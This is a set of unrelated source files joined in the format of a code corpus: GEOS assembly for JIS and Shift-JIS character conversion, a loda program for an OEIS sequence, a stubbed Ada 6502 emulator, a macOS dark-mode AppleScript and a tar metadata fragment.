@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DosJISToGeosCharFar %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a JIS character to a GEOS character CALLED BY: DCSConvertToDOSChar() PASS: bx - DosCodePage to use ax - JIS character RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS or al - DTGSS_INVALID_CHARACTER else: ax - GEOS character DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: This should deal with JIS characters that are not in SJIS. REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ DosJISToGeosCharFar proc far .enter ; ; Convert the JIS character to SJIS ; call ConvJISToSJIS jc done ; ; Convert the SJIS character to GEOS ; call DosSJISToGeosCharFar done: .leave ret DosJISToGeosCharFar endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% GeosToDosJISCharFar %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a GEOS character to a JIS character. CALLED BY: DCSConvertToGEOSChar() PASS: bx - DosCodePage to use ax - GEOS character RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS else: ax - JIS character DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: This should deal with JIS characters that are not in SJIS. REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ GeosToDosJISCharFar proc far .enter ; ; Convert the GEOS character to SJIS ; call GeosToDosSJISCharFar jc done ; ; Convert the SJIS character to JIS ; call ConvSJISToJIS done: .leave ret GeosToDosJISCharFar endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ConvJISToSJIS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a JIS character to SJIS CALLED BY: DosJISToGeosCharFar() PASS: ax - JIS character RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS al - DTGSS_INVALID_CHARACTER else: ax - SJIS character DESTROYED: none PSEUDO CODE/STRATEGY: c1 = j/256; c2 = j%256; rowOffset = (c1 < 95) ? 112 : 176; cellOffset = (c1 % 2) ? (31 + (c2 > 95)) : 126; r1 = ((c1 + 1) >> 1) + rowOffset; r2 = c2 + cellOffset; return(r1256 + r2); KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ConvJISToSJIS proc near uses dx .enter ; ; Check for SBCS character ; tst ah ;SBCS JIS char? jz done ;branch if SBCS ; ; dh = rowOffset = (c1 < 95) ? 112 : 176; ; mov dh, 112 ;dh <- row offset cmp ah, 95 jb gotRowOffset mov dh, 176 ;dh <- row offset gotRowOffset: ; ; dl = cellOffset = (c1 % 2) ? (31 + (c2 > 95)) : 126; ; mov dl, 126 ;dl <- cell offset test ah, 0x1 jz gotCellOffset ;branch if false mov dl, 31 ;dl <- cell offset cmp al, 95 ;branch if false jbe gotCellOffset inc dl ;dl <- cell offset gotCellOffset: ; ; r1 = ((c1 + 1) >> 1) + rowOffset ; inc ah shr ah, 1 add ah, dh ; ; r2 = c2 + cellOffset; ; add al, dl done: .leave ret ConvJISToSJIS endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ConvSJISToJIS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a SJIS character to JIS CALLED BY: GeosToDosJISCharFar() PASS: ax - SJIS character RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS al - DTGSS_INVALID_CHARACTER else: ax - JIS character DESTROYED: none PSEUDO CODE/STRATEGY: c1 = j/256; c2 = j%256; adjust = c2 < 159; rowOffset = c1 < 160 ? 112 : 176; cellOffset = adjust ? (31 + (c2 > 127)) : 126; r1 = ((c1 - rowOffset) << 1) - adjust; r2 = c2-cellOffset; return(r1256+r2); KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ConvSJISToJIS proc near uses cx, dx .enter ; ; Check for SBCS character ; tst ah ;SBCS SJIS char? jz done ;branch if SBCS clr cx ;cx <- adjust (0) cmp al, 159 jae gotAdjust inc cx ;cx <- adjust (1) gotAdjust: ; ; dh = rowOffset = c1 < 160 ? 112 : 176; ; mov dh, 112 ;dh <- row offset cmp ah, 160 jb gotRowOffset mov dh, 176 ;dh <- row offset gotRowOffset: ; ; dl = cellOffset = adjust ? (31 + (c2 > 127)) : 126; ; mov dl, 126 ;dl <- cell offset jcxz gotCellOffset ;branch if false mov dl, 31 ;dl <- cell offset cmp al, 127 jbe gotCellOffset ;branch if false inc dl ;dl <- cell ofset gotCellOffset: ; ; r1 = ((c1 - rowOffset) << 1) - adjust; ; sub ah, dh shl ah, 1 sub ah, cl ; ; r2 = c2-cellOffset; ; sub al, dl done: .leave ret ConvSJISToJIS endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DosJISToGeosCharStringFar %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a JIS character in a string to a GEOS character CALLED BY: DCSConvertToGEOSChar() PASS: bx - DosCodePage to use ds:si - ptr to JIS string es:di - ptr to GEOS buffer cx - max # of bytes to read RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS ah - # of bytes to back up al - DTGSS_CHARACTER_INCOMPLETE else: ax - GEOS character ds:si - ptr to next character es:di - ptr to next character cx - updated if >1 byte read bx - DosCodePage (may have changed) DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ DosJISToGeosCharStringFar proc far .enter ; ; Get a byte and see if it is the start of an escape sequence ; nextChar: lodsb ;al <- byte of JIS string cmp al, C_ESCAPE ;<Esc>? je handleEsc ; ; See if we are doing SBCS or DBCS ; cmp bx, CODE_PAGE_JIS ;doing SBCS? jne isDBCS ;branch if not ; ; Reading SBCS -- just use the byte ; call doSBCSChar ;ax = GEOS char jc exit ; ; Store the GEOS character ; storeChar: stosw ;store GEOS character exit: .leave ret ; ; Read first byte of a two byte character, or first one or ; two bytes of three byte ESC seq, but rest is not there to read ; partialChar3: mov ah, 3 ;ah <- # bytes to back up jmp partialCharCommon partialChar2: mov ah, 2 ;ah <- # bytes to back up jmp partialCharCommon partialChar1: mov ah, 1 ;ah <- # bytes to back up partialCharCommon: mov al, DTGSS_CHARACTER_INCOMPLETE stc ;carry <- error jmp exit ; ; Reading DBCS -- get another byte ; isDBCS: call readDBCSByte2 jz partialChar1 ;branch if partial character ; ; Convert JIS to GEOS ; call DosJISToGeosCharFar jc exit ;branch if error jmp storeChar ; ; We've hit an <Esc> -- switch modes if necessary. ; handleEsc: call readDBCSByte1 ;al <- byte after ESC jz partialChar1 call readDBCSByte2 ;ax <- both bytes after ESC jz partialChar2 ;branch if partial character cmp bx, CODE_PAGE_JIS ;in SBCS or DBCS? je inSBCS ;branch if in SBCS ; ; We're in DBCS -- check for an escape to SBCS ; cmp ax, JIS_C_0208_1978_KANJI_ESC je doneEscape ;allow redundant escape cmp ax, JIS_X_0208_1983_KANJI_ESC je doneEscape ;allow redundant escape cmp ax, ANSI_X34_1986_ASCII_ESC je switchToSBCS cmp ax, JIS_X_0201_1976_ROMAN_ESC je switchToSBCS ; ; other escape sequence while in double byte JIS mode, ; return error as ESC is illegal JIS first byte ; mov ax, DTGSS_INVALID_CHARACTER or (0 shl 8) stc ;carry <- error jmp exit switchToSBCS: mov bx, CODE_PAGE_JIS ;bx <- new DosCodePage jmp doneEscape ; ; We're in SBCS -- check for an escape to DBCS ; inSBCS: cmp ax, ANSI_X34_1986_ASCII_ESC je doneEscape ;allow redundant escape cmp ax, JIS_X_0201_1976_ROMAN_ESC je doneEscape ;allow redundant escape cmp ax, JIS_C_0208_1978_KANJI_ESC je switchToDBCS cmp ax, JIS_X_0208_1983_KANJI_ESC je switchToDBCS ; ; other escape sequence while in JIS single byte mode ; -- store the three bytes in GEOS format ; ESC = 1st byte ; ah = 2nd byte ; al = 3rd byte ; cx = (number of characters after escape) + 1 ; push dx mov dx, ax ;save 2nd and 3rd bytes mov ax, C_ESCAPE ;first is escape stosw ;store 1st char clr ax mov al, dh ;ax = 2nd byte call doSBCSChar jc doneEscapePop stosw ;store 2nd char clr ax mov al, dl ;ax = 3rd byte call doSBCSChar jc doneEscapePop stosw doneEscapePop: ; ; finish off non-recognized escape sequence ; pop dx dec cx jnz nextChar clc ;indicate success jmp exit doneEscape: ; ; finish off a recognized escape sequence -- return "incomplete" error ; if nothing follows the escape sequence. This is because we ; are expected to return a converted character, and at this ; point we have read nothing but the escape sequence. ; dec cx jz partialChar3 jmp nextChar switchToDBCS: ; ; Switch to DBCS ; mov bx, CODE_PAGE_JIS_DB ;bx <- new DosCodePage jmp doneEscape ; ; al = SBCS char ; doSBCSChar: clr ah ;ax <- ASCII char ; ; Handle half-width katakana (JIS same as SJIS) ; cmp al, SJIS_SB_START_2 jb doSBCSReturn ;not half-width katakana cmp al, SJIS_SB_END_2 ja doSBCSReturn ;not half-width katakana call DosJISToGeosCharFar ;convert half-width katakana retn ;return status in carry flag doSBCSReturn: clc ;indicate success retn readDBCSByte1: dec cx ;cx <- read one more byte jz isPartialChar ;branch if no more bytes lodsb ;al <- 1st byte retn readDBCSByte2: dec cx ;cx <- read one more byte jz isPartialChar ;branch if no more bytes xchg al, ah lodsb ;ax <- JIS character isPartialChar: retn DosJISToGeosCharStringFar endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% GeosToDosJISCharStringFar %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a GEOS character in a string to a JIS character CALLED BY: DCSConvertToGEOSChar() PASS: bx - DosCodePage to use ds:si - ptr to GEOS string es:di - ptr to JIS buffer cx - max # of chars to read RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS else: ax - JIS character ds:si - ptr to next character es:di - ptr to next character bx - DosCodePage (may have chanaged) DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ GeosToDosJISCharStringFar proc far .enter ; ; Get a GEOS character and convert to JIS ; lodsw ;ax <- GEOS character call GeosToDosJISCharFar jc exit ;branch if error ; ; Check for ASCII / SBCS ; tst ah ;SBCS or DBCS? jnz isDBCS ;branch if DBCS ; ; ASCII char -- make sure we're in SBCS mode ; cmp bx, CODE_PAGE_JIS jne switchToSBCS storeSBCSChar: stosb ;store SBCS character done: clc ;carry <- no error exit: .leave ret ; ; Switch to SBCS and emit the proper escape sequence ; switchToSBCS: mov bx, offset escapeToSBCS call writeEsc mov bx, CODE_PAGE_JIS jmp storeSBCSChar ; ; DBCS char -- make sure we're in DBCS mode ; isDBCS: cmp bx, CODE_PAGE_JIS_DB jne switchToDBCS storeDBCSChar: xchg al, ah ;store high-low stosw ;store DBCS character jmp done ; ; Switch to SBCS and emit the proper escape sequence ; switchToDBCS: mov bx, offset escapeToDBCS call writeEsc mov bx, CODE_PAGE_JIS_DB jmp storeDBCSChar ; ; Emit a 3-byte escape sequence ; escapeToSBCS byte 0x1b, 0x28, 0x4a ;<ESC> ( J escapeToDBCS byte 0x1b, 0x24, 0x42 ;<ESC> $ B writeEsc: push ds, si segmov ds, cs mov si, bx movsb movsb movsb CheckHack <(length escapeToSBCS) eq 3> pop ds, si retn GeosToDosJISCharStringFar endp ConvertRare ends
programs/oeis/226/A226164.asm	karttu/loda	0	92431	<filename>programs/oeis/226/A226164.asm ; A226164: Sequence used for the quadratic irrational number belonging to the principal indefinite binary quadratic form. ; 1,2,2,3,3,4,3,4,4,5,4,5,5,6,5,6,5,6,6,7,6,7,6,7,7,8,7,8,7,8,7,8,8,9,8,9,8,9,8,9,9,10,9,10,9,10,9,10,9,10,10,11,10,11,10,11,10,11,10,11,11,12,11,12,11,12,11,12,11,12,11,12,12,13,12,13,12,13,12,13,12 mov $2,$0 mov $4,$0 mov $5,$0 gcd $5,2 lpb $2,1 add $3,$0 mul $4,2 lpb $4,1 sub $4,$5 add $5,1 trn $4,$5 add $7,2 lpe lpb $5,1 mov $0,3 sub $5,$5 add $6,$3 lpe lpb $6,1 mov $0,$7 mov $6,1 lpe add $6,4 cmp $2,$6 lpe mov $1,$0 div $1,2 add $1,1
Ada/src/instruction.adb	herrBez/MOS6502-Emulator	3	28646	package body Instruction is function Initialize_Instruction_Table return Fun_Array is Instruction_Table : Fun_Array(0..255) := (others => Not_Yet_Supported_Operation'Access); begin Instruction_Table(16#EA#) := NOP'Access; return Instruction_Table; end Initialize_Instruction_Table; procedure Not_Yet_Supported_Operation(This : in out MOS_T) is begin Put("Operation"); Put_Hex(Integer(This.Mem(This.PC))); Put("Not Supported"); New_Line; end Not_Yet_Supported_Operation; -------------------------------------------------------------------- -- ADC FUNCTIONS -- Add memory to accumulator with carry -------------------------------------------------------------------- procedure ADC_Immediate (This : in out MOS_T) is begin null; end; procedure ADC_Absolute (This : in out MOS_T) is begin null; end; procedure ADC_Zero_Page (This : in out MOS_T) is begin null; end; procedure ADC_Absolute_X (This : in out MOS_T) is begin null; end; procedure ADC_Absolute_Y (This : in out MOS_T) is begin null; end; procedure ADC_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure ADC_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- AND FUNCTIONS: -- "AND" memory with accumulator -------------------------------------------------------------------- procedure AND_Immediate (This : in out MOS_T) is begin null; end; procedure AND_Absolute (This : in out MOS_T) is begin null; end; procedure AND_Zero_Page (This : in out MOS_T) is begin null; end; procedure AND_Absolute_X (This : in out MOS_T) is begin null; end; procedure AND_Absolute_Y (This : in out MOS_T) is begin null; end; procedure AND_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure AND_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- ASL: -- Shift left one bit (Memory or Accumulator) -------------------------------------------------------------------- procedure ASL_Accumulator (This : in out MOS_T) is begin null; end; procedure ASL_Zero_Page (This : in out MOS_T) is begin null; end; procedure ASL_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure ASL_Absolute (This : in out MOS_T) is begin null; end; procedure ASL_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BCC: -- Branch on carry clear -------------------------------------------------------------------- procedure BCC (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BCS: -- Branch on carry set -------------------------------------------------------------------- procedure BCS (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BEQ: -- Branch on result zero -------------------------------------------------------------------- procedure BEQ (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BIT: -- Test bits in memory with accumulator -------------------------------------------------------------------- procedure BIT (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BMI: -- Branch on result minus -------------------------------------------------------------------- procedure BMI (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BNE -- Branch on result not zero -------------------------------------------------------------------- procedure BNE (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BPL -- Branch on result plus -------------------------------------------------------------------- procedure BPL (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BRK -- Force Break -------------------------------------------------------------------- procedure BRK (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BVC -- Branch on overflow clear -------------------------------------------------------------------- procedure BVC (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- BVS -- Branch on overflow set -------------------------------------------------------------------- procedure BVS (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CLC -- Clear carry flag -------------------------------------------------------------------- procedure CLC (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CLC -- Clear decimal mode -------------------------------------------------------------------- procedure CLD (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CLI -- Clear interrupt disable status -------------------------------------------------------------------- procedure CLI (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CLV -- Clear overflow flag -------------------------------------------------------------------- procedure CLV (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CMP FUNCTIONS -- Compare memory and accumulator -------------------------------------------------------------------- procedure CMP_Immediate (This : in out MOS_T) is begin null; end; procedure CMP_Absolute (This : in out MOS_T) is begin null; end; procedure CMP_Zero_Page (This : in out MOS_T) is begin null; end; procedure CMP_Absolute_X (This : in out MOS_T) is begin null; end; procedure CMP_Absolute_Y (This : in out MOS_T) is begin null; end; procedure CMP_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure CMP_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CPX FUNCTIONS -- Compare memory and index X -------------------------------------------------------------------- procedure CPX_Immediate (This : in out MOS_T) is begin null; end; procedure CPX_Absolute (This : in out MOS_T) is begin null; end; procedure CPX_Zero_Page (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- CPY FUNCTIONS -- Compare memory and index Y -------------------------------------------------------------------- procedure CPY_Immediate (This : in out MOS_T) is begin null; end; procedure CPY_Absolute (This : in out MOS_T) is begin null; end; procedure CPY_Zero_Page (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- DEC -- Decrement memory by one -------------------------------------------------------------------- procedure DEC_Zero_Page (This : in out MOS_T) is begin null; end; procedure DEC_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure DEC_Absolute (This : in out MOS_T) is begin null; end; procedure DEC_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- DEX -- Decrement index X by one -------------------------------------------------------------------- procedure DEX (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- DEY -- Decrement index X by one -------------------------------------------------------------------- procedure DEY (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- EOR FUNCTIONS -- Exclusive-OR memory and accumulator -------------------------------------------------------------------- procedure EOR_Immediate (This : in out MOS_T) is begin null; end; procedure EOR_Absolute (This : in out MOS_T) is begin null; end; procedure EOR_Zero_Page (This : in out MOS_T) is begin null; end; procedure EOR_Absolute_X (This : in out MOS_T) is begin null; end; procedure EOR_Absolute_Y (This : in out MOS_T) is begin null; end; procedure EOR_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure EOR_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- INC -- Increment memory by one -------------------------------------------------------------------- procedure INC_Zero_Page (This : in out MOS_T) is begin null; end; procedure INC_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure INC_Absolute (This : in out MOS_T) is begin null; end; procedure INC_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- INX -- Increment index X by one -------------------------------------------------------------------- procedure INX (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- INY -- Increment index X by one -------------------------------------------------------------------- procedure INY (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- JMP -- Jump to new location -------------------------------------------------------------------- procedure JMP_Absolute (This : in out MOS_T) is begin null; end; procedure JMP_Absolute_Indirect (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- JSR -- Jump to new location saving return address -------------------------------------------------------------------- procedure JSR_Absolute (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- LDA -- Load accumulator with memory -------------------------------------------------------------------- procedure LDA_Immediate (This : in out MOS_T) is begin null; end; procedure LDA_Absolute (This : in out MOS_T) is begin null; end; procedure LDA_Zero_Page (This : in out MOS_T) is begin null; end; procedure LDA_Absolute_X (This : in out MOS_T) is begin null; end; procedure LDA_Absolute_Y (This : in out MOS_T) is begin null; end; procedure LDA_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure LDA_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- LDX -- Load index X with memory -------------------------------------------------------------------- procedure LDX_Immediate (This : in out MOS_T) is begin null; end; procedure LDX_Zero_Page (This : in out MOS_T) is begin null; end; procedure LDX_Zero_Page_Y (This : in out MOS_T) is begin null; end; procedure LDX_Zero_Page_Absolute (This : in out MOS_T) is begin null; end; procedure LDX_Zero_Page_Absolute_Y (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- LDY -- Load index Y with memory -------------------------------------------------------------------- procedure LDY_Immediate (This : in out MOS_T) is begin null; end; procedure LDY_Zero_Page (This : in out MOS_T) is begin null; end; procedure LDY_Zero_Page_Y (This : in out MOS_T) is begin null; end; procedure LDY_Zero_Page_Absolute (This : in out MOS_T) is begin null; end; procedure LDY_Zero_Page_Absolute_Y (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- LSR -- Shift right one bit (memory or accumulator) -------------------------------------------------------------------- procedure LSR_Accumulator (This : in out MOS_T) is begin null; end; procedure LSR_Zero_Page (This : in out MOS_T) is begin null; end; procedure LSR_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure LSR_Absolute (This : in out MOS_T) is begin null; end; procedure LSR_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- NOP -- No operation -------------------------------------------------------------------- procedure NOP (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- OR FUNCTIONS: -- "OR" memory with accumulator -------------------------------------------------------------------- procedure OR_Immediate (This : in out MOS_T) is begin null; end; procedure OR_Absolute (This : in out MOS_T) is begin null; end; procedure OR_Zero_Page (This : in out MOS_T) is begin null; end; procedure OR_Absolute_X (This : in out MOS_T) is begin null; end; procedure OR_Absolute_Y (This : in out MOS_T) is begin null; end; procedure OR_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure OR_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- PHA -- Push accumulator on stack -------------------------------------------------------------------- procedure PHA (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- PHP -- Push processor status on stack -------------------------------------------------------------------- procedure PHP (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- PLA -- Pull accumulator from stack -------------------------------------------------------------------- procedure PLA (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- PLP -- Pull accumulator from stack -------------------------------------------------------------------- procedure PLP (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- ROL -- Rotate one bit left (memory or accumulator) -------------------------------------------------------------------- procedure ROL_Accumulator (This : in out MOS_T) is begin null; end; procedure ROL_Zero_Page (This : in out MOS_T) is begin null; end; procedure ROL_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure ROL_Absolute (This : in out MOS_T) is begin null; end; procedure ROL_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- ROR -- Rotate one bit right (memory or accumulator) -------------------------------------------------------------------- procedure ROR_Accumulator (This : in out MOS_T) is begin null; end; procedure ROR_Zero_Page (This : in out MOS_T) is begin null; end; procedure ROR_Zero_Page_X (This : in out MOS_T) is begin null; end; procedure ROR_Absolute (This : in out MOS_T) is begin null; end; procedure ROR_Absolute_X (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- RTI: -- return from interrupt -------------------------------------------------------------------- procedure RTI (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- RTS: -- return from subroutine -------------------------------------------------------------------- procedure RTS (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- SBC: -- Subtract memory from accumulator with borrow -------------------------------------------------------------------- procedure SBC_Immediate (This : in out MOS_T) is begin null; end; procedure SBC_Absolute (This : in out MOS_T) is begin null; end; procedure SBC_Zero_Page (This : in out MOS_T) is begin null; end; procedure SBC_Absolute_X (This : in out MOS_T) is begin null; end; procedure SBC_Absolute_Y (This : in out MOS_T) is begin null; end; procedure SBC_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure SBC_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- SEC -- Set carry flag -------------------------------------------------------------------- procedure SEC (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- SED -- Set decimal mode -------------------------------------------------------------------- procedure SED (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- SEI -- Set interrupt disable status -------------------------------------------------------------------- procedure SEI (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- STA: -- Stone accumulator in memory -------------------------------------------------------------------- procedure STA_Immediate (This : in out MOS_T) is begin null; end; procedure STA_Absolute (This : in out MOS_T) is begin null; end; procedure STA_Zero_Page (This : in out MOS_T) is begin null; end; procedure STA_Absolute_X (This : in out MOS_T) is begin null; end; procedure STA_Absolute_Y (This : in out MOS_T) is begin null; end; procedure STA_Zero_Page_X_Indexed_Indirect (This : in out MOS_T) is begin null; end; procedure STA_Zero_Page_Y_Indirect_Indexed (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- STX -- Store index X in memory -------------------------------------------------------------------- procedure STX_Zero_Page (This : in out MOS_T) is begin null; end; procedure STX_Zero_Page_Y (This : in out MOS_T) is begin null; end; procedure STX_Absolute (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- STY -- Store index Y in memory -------------------------------------------------------------------- procedure STY_Zero_Page (This : in out MOS_T) is begin null; end; procedure STY_Zero_Page_Y (This : in out MOS_T) is begin null; end; procedure STY_Absolute (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TAX -- Transfer accumulator to index X -------------------------------------------------------------------- procedure TAX (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TAY -- Transfer accumulator to index Y -------------------------------------------------------------------- procedure TAY (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TSX -- Transfer stack pointer to index X -------------------------------------------------------------------- procedure TSX (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TXA -- Transfer index X to accumulator -------------------------------------------------------------------- procedure TXA (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TXS -- Transfer index X to stack pointer -------------------------------------------------------------------- procedure TXS (This : in out MOS_T) is begin null; end; -------------------------------------------------------------------- -- TYA -- Transfer index Y to accumulator -------------------------------------------------------------------- procedure TYA (This : in out MOS_T) is begin null; end; end Instruction;
mac/appearance.scpt	dhruvmanila/dotfiles	10	1240	<reponame>dhruvmanila/dotfiles tell application "System Events" tell appearance preferences -- (bool) Use dark mode for bar and dock. set dark mode to true -- Color used for highlighting selected text and lists. -- Available: blue gold graphite green orange purple red silver set highlight color to graphite end tell end tell
Virtual Memory Implementation/Theme_B_9/GeekOS (os)/src/geekos/PaxHeader/symbol.asm	Pintulalmeena/Projects	0	168313	<reponame>Pintulalmeena/Projects 14 uid=311598 27 mtime=1430738578.059251 27 atime=1430738578.058251
